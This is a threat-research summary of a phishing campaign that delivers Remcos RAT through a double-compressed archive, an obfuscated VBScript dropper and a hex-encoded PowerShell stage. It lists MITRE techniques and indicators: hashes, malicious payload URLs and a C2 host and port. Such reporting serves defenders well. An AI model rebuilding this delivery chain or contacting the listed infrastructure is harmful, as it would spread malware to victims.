Threat Research

Remcos RAT Delivered Through Double Compressed Archive

Securonix

Remcos RAT was delivered via a phishing email that attached a double-compressed archive, then unpacked to reveal an obfuscated VBScript dropper. The dropper uses a COM object (MSXML2.XMLHTTP.3.0) to fetch a Powershell-based payload and culminates in a Remcos payload contacting a remote C2. #RemcosRAT #kastex.me #srbizasrbe.org #notme.linkpc.net

Keypoints

  • The delivery route begins with a phishing email pretending to relate to a purchase order, with a file named “P0-65774383__pdf.tar.lz” attached.
  • The attachment uses a double extension (.tar.lz) and is processed via lunzip on a REMnux environment, indicating an unusual delivery method.
  • The extracted content includes a VBScript file “Protected Client.vbs” that is obfuscated.
  • The VBScript leverages a GetObject call to an ActiveX component (MSXML2.XMLHTTP.3.0) to retrieve remote content and run a PowerShell payload.
  • The PowerShell payload is hex-encoded and decodes into commands that download and execute further payloads from remote URLs.
  • A Remcos RAT sample is ultimately dropped and communicates with a C2 server at notme.linkpc.net:4376 (domain cited).
  • The campaign yields several IOCs (hashes, domains, and URLs) and demonstrates a multi-stage delivery chain combining scripting, obfuscation, and client-side object abuse.

MITRE Techniques

  • [T1566.001] Phishing: Attachment – Delivered via email attachment pretending to be related to a purchase order. Quote: “The file was received as an attachment to a mail that pretended to be related to a purchase order.”
  • [T1036] Masquerading – Note the double extension; it can be processed with lunzip on REMnux. Quote: “Note the double extension; it can be processed with lunzip on REMnux:”
  • [T1059.005] VBScript – The Protected Client.vbs script is obfuscated. Quote: “The ‘Protected Client.vbs’ script is nicely obfuscated.”
  • [T1027.001] Obfuscated/Compressed Files and Information – Sensitive strings are encoded/decoded via hex-encoding. Quote: “Sensitive strings (that could reveal the purpose of the script) are encoded and decoded using the following function: … It’s a simple hex-encoding!”
  • [T1059.001] PowerShell – The payload is hex-encoded and executed via PowerShell after decoding. Quote: “The file contains a Powershell payload, again hex-encoded:”
  • [T1105] Ingress Tool Transfer – Malicious content is loaded from a remote URL to populate the object. Quote: “The object is populated with malicious content loaded from the following URL:”
  • [T1071.001] Web Protocols – Remcos RAT uses HTTP-based C2 (notme.linkpc.net:4376). Quote: “it’s a Remcos RAT sample (C2: notme[.]linkpc[.]net:4376).”

Indicators of Compromise

  • [Hash] ea91dc0fdd99aab9e990b6520c136fc2f0c19b4ba82691ceef853ad4a86c0141 – Initial attachment’s SHA256 for P0-65774383__pdf.tar.lz
  • [Hash] 8e41caaf8c87e94296783d9907fa170e696175ff46a57584d04df6867b1cfab1 – Remcos payload SHA256
  • [Domain] kastex.me – URL hosting malicious content used in the dropper/payload chain
  • [Domain] srbizasrbe.org – Domain involved in hosting payload content referenced by the drop chain
  • [Domain] notme.linkpc.net – C2 domain used by the Remcos payload
  • [URL] hxxp://kastex[.]me/bkp/ybn.jpg – URL used to deliver/load payload content
  • [URL] hxxp://www[.]srbizasrbe[.]org/zts/ytk.jpg – Additional URL referenced in the chain
  • [File name] P0-65774383__pdf.tar.lz – Original double-extended archive name delivering the dropper
  • [File name] Protected Client.vbs – Obfuscated dropper script used in execution chain

Read more: https://isc.sans.edu/forums/diary/Remcos+RAT+Delivered+Through+Double+Compressed+Archive/28354/